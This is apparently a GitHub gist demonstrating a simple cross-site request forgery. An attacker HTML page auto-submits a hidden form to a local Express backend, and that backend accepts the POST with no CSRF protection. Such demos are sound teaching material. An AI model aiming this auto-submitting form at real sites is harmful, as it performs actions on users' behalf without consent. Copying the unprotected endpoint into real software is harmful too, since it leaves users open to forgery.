Last active
June 16, 2021 19:31
-
-
Save DashBarkHuss/b4ae425c3875a84084911918534d2bea to your computer and use it in GitHub Desktop.
Sample Node CSRF attack (simple, no cookies, no sessions)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- To test this CSRF attack, this page should be launched on a different local server (not localhost:4000) than the backend --> | |
| <!DOCTYPE html> | |
| <html lang="en"> | |
| <body> | |
| <form action=http://localhost:4000/item method=post > | |
| <input name ="itemName" value="Shirt" type="text"> | |
| <input type=submit> | |
| </form> | |
| <script> | |
| document.forms[0].submit(); | |
| </script> | |
| </body> | |
| </html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // This is the backend, which will be attacked by attackerSite.html. | |
| // Make sure to run this on localhost:4000 and run attackerSite.html on a different port. | |
| const express = require('express'); | |
| const app = express(); | |
| app.use(express.urlencoded()); | |
| app.post('/item', (req, res, next) => { | |
| console.log('posting item'); | |
| res.send(`posted item body: ${Object.keys(req.body)[0]}: ${Object.values(req.body)[0]}`); | |
| }); | |
| app.listen(4000) | |
| .on('listening', console.log("HTTP server listening on port 4000")); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment